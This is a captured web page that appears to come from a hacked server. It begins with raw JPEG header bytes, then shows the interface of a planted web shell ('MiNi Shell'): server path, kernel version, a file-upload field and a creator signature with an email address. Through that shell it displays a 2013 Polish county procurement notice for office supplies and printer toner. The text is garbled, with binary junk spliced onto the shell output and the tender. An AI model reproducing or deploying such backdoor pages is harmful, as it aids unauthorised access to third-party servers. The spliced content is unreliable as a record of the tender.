JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131204/500412-N-2013.html

<p class="kh_header"><b>Nisko: Dostawa materiałów biurowych i papierniczych, materiałów eksploatacyjnych do drukarek i kserokopiarek oraz specjalistycznych materiałów papierniczych do ploterów dla potrzeb Starostwa Powiatowego w Nisku.</b><br>
<b>Numer ogłoszenia: 500412 - 2013; data zamieszczenia: 04.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Niżański , Pl. Wolności 2, 37-400 Nisko, woj. podkarpackie, tel. 015 8412057, faks 015 8412700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nisko.pl, poczta@powiat-nisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i papierniczych, materiałów eksploatacyjnych do drukarek i kserokopiarek oraz specjalistycznych materiałów papierniczych do ploterów dla potrzeb Starostwa Powiatowego w Nisku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych i papierniczych, materiałów eksploatacyjnych do drukarek i kserokopiarek oraz specjalistycznych materiałów papierniczych do ploterów dla potrzeb Starostwa Powiatowego w Nisku.
Zamówienie podzielone zostało na 3 części:


Część 1 -  Dostawa materiałów biurowych i papierniczych (wg zestawienia). 
Załącznik  -  specyfikacja cenowa - materiały biurowe i papiernicze
Nazwa materiału
Jedn.
ilość
1
Blok listowy A5, biały papier
szt
30
2
Długopis żelowy t.gel pen dobrej jakości, niebieski, czarny (150 50 szt)
szt
150
3
Długopis zwykły dobrej jakości, niebieski, czarny (150 50szt)
szt
150
4
Długopis na sprężynce
szt
40
5
Dysk CD R w obudowie t. slim
szt
150
6
Dysk CD R bez obudowy 
szt
100
7
Dysk DVD+ R  w obudowie t.slim
szt
50
8
Etykiety samoprzylepne 70x37mm,  100 arkuszy, 2400 etykiet
opak
2
9
Ewidencja wyjść w godzinach służbowych, format A4, okładka kartonowa, 32 strony
szt
6
10
Folia do laminowania A4 100 mic 100 szt opak
opak
3
11
Foliopis permanentny do CD 0,6 mm
szt
10
12
Fastykuła bezkwasowa A4, gramatura 1230g m2
szt
100
13
Grzbiet do bindowania 155 - 210 kartek, kolor czarny, 25 mm (50szt)
opak
1
14
Grzbiet do bindowania 210 - 250 kartek, kolor czarny, 28mm (50szt)
opak
1
15
Gumki do mazania ołówka, średnie, nie małe
szt
20
16
Kalendarz na biurko, pionowy typu H5 Merkury na rok 2014 min. 19x13cm
szt
60
17
Kartoteka magazynowa A5 wg wzoru Typograf Września
szt
200
18
Koperta C5, biała samoklejąca ( 500 szt)
opak
10
19
Koperta E4 szara, z rozszerzonym dołem
szt
200
20
Koperta C 6, biała samoklejąca (1000 szt/)
opak
12
21
Koperta B4 , biała (250szt)
opak
6
22
Koperty  bąbelkowe  do przesyłania dysków CD
szt
100
23
Korektor w taśmie, dobrej jakości
szt
40
24
Kostka samoprzylepna kolorowa, 100kart, 38x51 mm 
opak
40
25
Kostka samoprzylepna kolorowa 100 kart, 76x76 mm 
szt
100
26
Koszulka PVC na CD do wpinania (10 szt)
opak
10
27
Koszulki na akta, obwoluty,  form.A4,  100 szt. w opak.  z folii krystalicznej PP, 55 mic
opak
10
28
Kostka wielokolorowa luz 8,5 x 8,5 cm
szt
30
29
Klej biurowy wysokiej jakości, nie marszczący papieru, do papieru, fotografii, tektury t.Esselte , pojemność 20 g
szt
40
30
Naboje do pióra wiecznego Parker Quink blue (5 szt)
opak
10
31
Papier ksero A3, CIE 161, 80 g/m2 (500szt) załączyć certyfikat
ryza
20
32
Papier ksero A4, CIE 161, 80 g/m2 (500szt) załączyć certyfikat
ryza
500
33
Płyta Blu-ray (5szt)
opak
2
34
Rolka termiczna 57x30 (10szt)
opak
10
35
Segregator kolorowe A4, 50 mm t. Esselte
szt
150
36
Segregator kolorowe A4, 75 mm t. Esselte
szt
150
37
Skoroszyt zawieszkowy ? A4, biały, kartonowy, bezkwasowy
szt
300
38
Skoroszyt oczkowy A4, biały, kartonowy, bezkwasowy
szt
200
39
Skoroszyt zwykły, biały A4 , bezkwasowy
szt
100
40
Skoroszyt plastikowy A4 , kolorowy
szt
150
41
Skoroszyt A4 twardy PCV z oczkami, kolorowy
szt
200
42
Spinacze metalowe trójkątne 28mm (100 szt)
opak
100
43
Taśma klejąca 24mm x 10m
szt
60
44
Teczka plastikowa z gumką A4
szt
40
45
Temperówka z pojemnikiem
szt
20
46
Tusz do stempli czerwony dobry czerwony, o gęstej konsystencji
szt
10
47
Teczka z gumką kolorowa, błyszcząca,  z bardzo grubej tektury 450g m2
szt
30
48
Teczka wiązana A4 z tektury bezkwasowej  na większa ilość dokumentów
300-320 g m2  
szt
800
49
Zakładki indeksujące 8 x prostokąt 45 x 12,  kolorowe
szt
20
50
Zeszyt 60 kart, kratka, A5
szt
20
51
Zeszyt A4 z twarda okładką, kratka, 96 stron
szt
20
52
Zakreślacz kolorowy (żółty, zielony, pomarańczowy, czerwony)
szt
20
53
Zszywacz do co najmniej 60 kartek
szt
10
54
Zszywki 24/6 t. Esselte (1000szt)
opak
50
55
Zszywki  25 10 (1000szt)
opak
6

łączna cena brutto
Część 2 - Dostawa materiałów eksploatacyjnych do kserokopiarek i drukarek
Załącznik B  -  specyfikacja cenowa  - materiały eksploatacyjne do drukarek i kserokopiarek
 Lp.
      Nazwa przedmiotu
Jedn.
   Ilość
R/O
1
Atrament HP 5652 czarny, 19 ml
Szt.
2

2
Atrament HP 5652 kolorowy, 17 ml
Szt.
2

3
Toner HP LJ 1100, 2500 kopii
Szt.
2

4
Toner HP 1505 n, 4 tys. kopii
Szt.
3

5
Toner do HP 1005, 1200, 1200 kopii
Szt.
1

6
Toner OKI B  431d, 12000 kopii
Szt.
2
o
7
Toner Lexmark 321, 6 tys. kopii
Szt.
3

8
Toner Lexmark E120 , 2000 kopii 
Szt.
8
o
9
Toner Samsung ML 2571N, ML1610,  3000 kopii
Szt.
10

10
Toner Samsung ML1640, 1500 kopii
Szt.
2

11
Toner Samsung ML 3051 ND, 8000 kopii
Szt.
2

12
Toner Samsung ML 2955 DW, 2500 kopii
Szt.
2
o
13
Toner Dell 2230, 3500 kopii
Szt.
12

14
Toner  Dell 2330, 6000 kopii
Szt.
5
o
15
Toner Ricoh  2016, 9000 kopii
Szt.
3

16
Toner Ricoh  2022, MP 2550 SPC, 2851 MP, 11 000 kopii
Szt.
8
o
17
Toner Ricoh 2050 PCL6, kolor c m y, 9500 kopii
kpl
1
o
18
Toner Ricoh MPC 2800 kolor, 16 tys. Kopii c m y
kpl
1
o
19
Toner Ricoh MP C 3002, czarny, 20000 kopii
Szt.
1
o
20
Toner Ricoh Aficio SP C232SF, czarny  6500 kopii
Szt.
1

21
Toner Ricoh Aficio SP C232SF, kolor, c m y 6000 kopii
kpl
1

Część 3 - Dostawa materiałów papierniczych do ploterów
Załącznik C - specyfikacja cenowa  -  materiały papiernicze do ploterów

LP.
Nazwa asortymentu
jedn. miary
ilość
1
Papier do Ricoh Aficio MP W2401, wysoka biel, bezpyłowy 80g m2, 0,841 x 175 m, średnica wewnętrzna rolki 7,6 cm
opak.
2
2
Papier do Ricoh Aficio MP W2401, wysoka biel, bezpyłowy 80g m2, 0,594 x 175 m, średnica wewnętrzna rolki 7,6 cm
opak.
2
3
Papier do plotera HP 510 PS, wysoka biel, bezpyłowy 90g/m2, 0,841 x 50 m, średnica wewnętrzna rolki 5,1 cm
opak.
2
4
Folia do plotera HP 510 PS 0,610x30m, 100?, średnica wewnętrzna rolki 5,1 cm
opak
2

Wykonawca może złożyć ofertę na jedną dwie lub trzy części.
Szczegółowy opis potrzeb Zamawiającego został opisany powyżej wg zestawień poszczególnych części zamówienia. 
Wymagania odnośnie materiałów biurowych i papierniczych.
Dostarczany przedmiot zamówienia musi być nowy, fabrycznie opakowany, wolny od wad technicznych, jakościowo dobry oraz spełniać wymagania obowiązujących norm  i przepisów. 
W przypadku gdy zamawiający dokonał opisu przedmiotu zamówienia w SIWZ przez wskazanie przykładowych znaków towarowych lub pochodzenia, wykonawcy mogą zaoferować materiały równoważne o parametrach tego typu, lecz nie gorszych od wskazanych. Materiały równoważne muszą być w ofercie wymienione z nazwy, a ciężar udowodnienia o zachowaniu parametrów wymaganych przez zamawiającego leży po stronie składającego ofertę.
Wymagania odnośnie materiałów eksploatacyjnych do kserokopiarek i drukarek.
Zamawiający nie dopuszcza materiałów eksploatacyjnych - atramentów i tonerów posiadających pojemności startowe.
Zamawiający wymaga dostarczenia do kserokopiarek i drukarek oznaczonych w zestawieniu lit. O, materiałów eksploatacyjnych oryginalnych, których producentem jest producent urządzenia, do którego mają zastosowanie.
Dostarczane materiały eksploatacyjne do drukarek i kserokopiarek atramenty i tonery oznaczone literką O w zestawieniu dostarczone jako oryginalne, muszą być fabrycznie nowe, do produkcji których nie użyto składników poprzednio eksploatowanych, uzupełnianych bądź przerabianych, ponadto muszą posiadać nienaruszone cechy pierwotnego opakowania umożliwiające identyfikacje, na opakowaniu winien być umieszczony znak firmowy i określenie pochodzenia (producenta) zawierający opis zawartości określający ilość, rodzaj i parametry techniczne bez konieczności naruszania opakowania oraz z wszelkimi zabezpieczeniami stosowanymi przez producentów (np. hologramy).
Zamawiający dopuszcza dostawę materiałów eksploatacyjnych równoważnych  do oryginalnych. 
Przez materiał eksploatacyjny równoważny Zamawiający rozumie produkt wykonany  z nowych elementów, kompatybilny ze sprzętem, do którego jest zamówiony,  o parametrach takich samych bądź lepszych (pojemność atramentu tonera, wydajność i jakość wydruku) w stosunku do oryginału produkowanego przez producenta urządzenia.
Wykonawca w formularzu ofertowym w wolnej rubryce oznacza rodzaj dostarczanego materiału literą O - oryginalny a literką R - równoważny.  Nie oznaczenie pozycji uznane będzie jako dostawa materiałów oryginalnych.
Udowodnienie równoważności oferowanych materiałów będzie leżało po stronie Wykonawcy.  
Wykonawca bierze na siebie pełną odpowiedzialność za uszkodzenia sprzętu spowodowane używaniem zaoferowanych materiałów.
W przypadku uszkodzenia urządzenia, którego przyczyną będzie użycie dostarczanych materiałów eksploatacyjnych innych niż pochodzące od producenta sprzętu, Wykonawca zobowiązany będzie do zwrotu kosztów naprawy urządzenia lub naprawy w autoryzowanym serwisie producenta a w przypadku takiej konieczności - zwrotu kosztów zleconej przez Zamawiającego ekspertyzy rzeczoznawcy.
Jeżeli w trakcie umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych produktów niekorzystnie odbiega od parametrów produktu oryginalnego (pochodzącego od producenta urządzenia, do którego materiał jest kupowany) lub jeśli produkt nie sygnalizuje we właściwy sposób zużycia atramentu lub tonera, Wykonawca na żądanie zamawiającego winien oferowany towar wymienić na spełniający wymagania Zamawiającego bez zmiany ceny..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.21.13-6, 30.12.51.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału  w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w  postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w  postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (załącznik nr 1 do SIWZ wraz z załącznikami) 2. W przypadku gdy Wykonawcę reprezentuje pełnomocnik do oferty winno być załączone pełnomocnictwo posiadające zakres uprawnień i podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są następujące przypadki i warunki zmiany umowy:
zmniejszenie zakresu przedmiotu zamówienia gdy jego wykonanie w pierwotnym 	zakresie nie leży w interesie Zamawiającego w granicach uzasadnionego interesu 	Zamawiającego,
zmiany terminu realizacji przedmiotu zamówienia, w przypadku:
gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży                   	w interesie Zamawiającego w zakresie uzasadnionego interesu Zamawiającego,
wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego do 	przewidzenia i niemożliwego do zapobieżenia,
zaistnienia okoliczności (technicznych, gospodarczych itp.) których nie można było 	przewidzieć chwili zawarcia umowy,
konieczności zmiany osób przewidzianych do wykonania przedmiotu umowy,
wprowadzenia nowej technologii lub innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca może ją odpowiednio obniżyć,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-nisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nisku, Plac Wolności 2, 37 - 400 Nisko - Wydział Gospodarki Mieniem Powiatu..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 10:45, miejsce: Starostwo Powiatowe w Nisku, Pl. Wolności 2, 37 - 400 Nisko w Biurze Obsługi Interesanta (pok. nr 1)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com